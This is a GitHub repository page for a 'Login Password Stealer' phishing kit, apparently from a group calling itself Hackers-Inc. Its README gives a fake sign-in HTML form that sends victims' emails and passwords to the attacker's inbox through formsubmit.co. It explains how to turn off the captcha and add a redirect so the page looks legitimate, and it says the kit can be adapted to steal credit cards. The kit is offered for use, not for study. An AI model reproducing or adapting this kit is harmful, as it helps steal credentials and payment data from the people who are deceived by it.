Skip to content

Hackers-Inc/Login-Password-Stealer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

Login Password Stealer

Login Password Stealer

Features:

  1. Sending Passwords to your email
  2. Sending usernames to your email
  3. Can customize to credit card stealer

Requirements

  1. Code Editor: Visual Studio Code, Sublime, Replit (Any IDE text editor for html)
  2. basic html and computer knowledge.

Set-up:

  1. Copy the given html code.

<form action="https://formsubmit.co/YOUREMAIL@GMAIL.COM" method="POST">
      <h1>Title</h1>
      <h6>Please sign in with your whatever account</h6>
      <input type="text" name="email" placeholder="Email" required>
      <input type="hidden" name="_next" value="https://hackers-inc.github.oi/success.html">
      <input type="hidden" name="_captcha" value="false">
      <input type="password" name="password" placeholder="Password" required>
      <button type="submit">Sign in</button>
  <input type="hidden" name="_next" value="https://hackers-inc.github.oi/success.html">
  <!--This is not required unless you want to look ligetiment and take you to another page.-->
  <input type="hidden" name="_captcha" value="false">
  <!--This is not requried. It disables the capatcha for the formsubmit to make it not show the logo-->

Example:

Set-up: Email

 <form action="https://formsubmit.co/YOUREMAIL@GMAIL.COM" method="POST">

Where it says YOURMAIL@GMAIL.COM is where you would put your email. Before you send the website out MAKE SURE to test it yourself because Formsubmit will ask you to "verify" your email.


Example of the email your looking for.
Thanks for checking us out!

Releases

No releases published

Packages

No packages published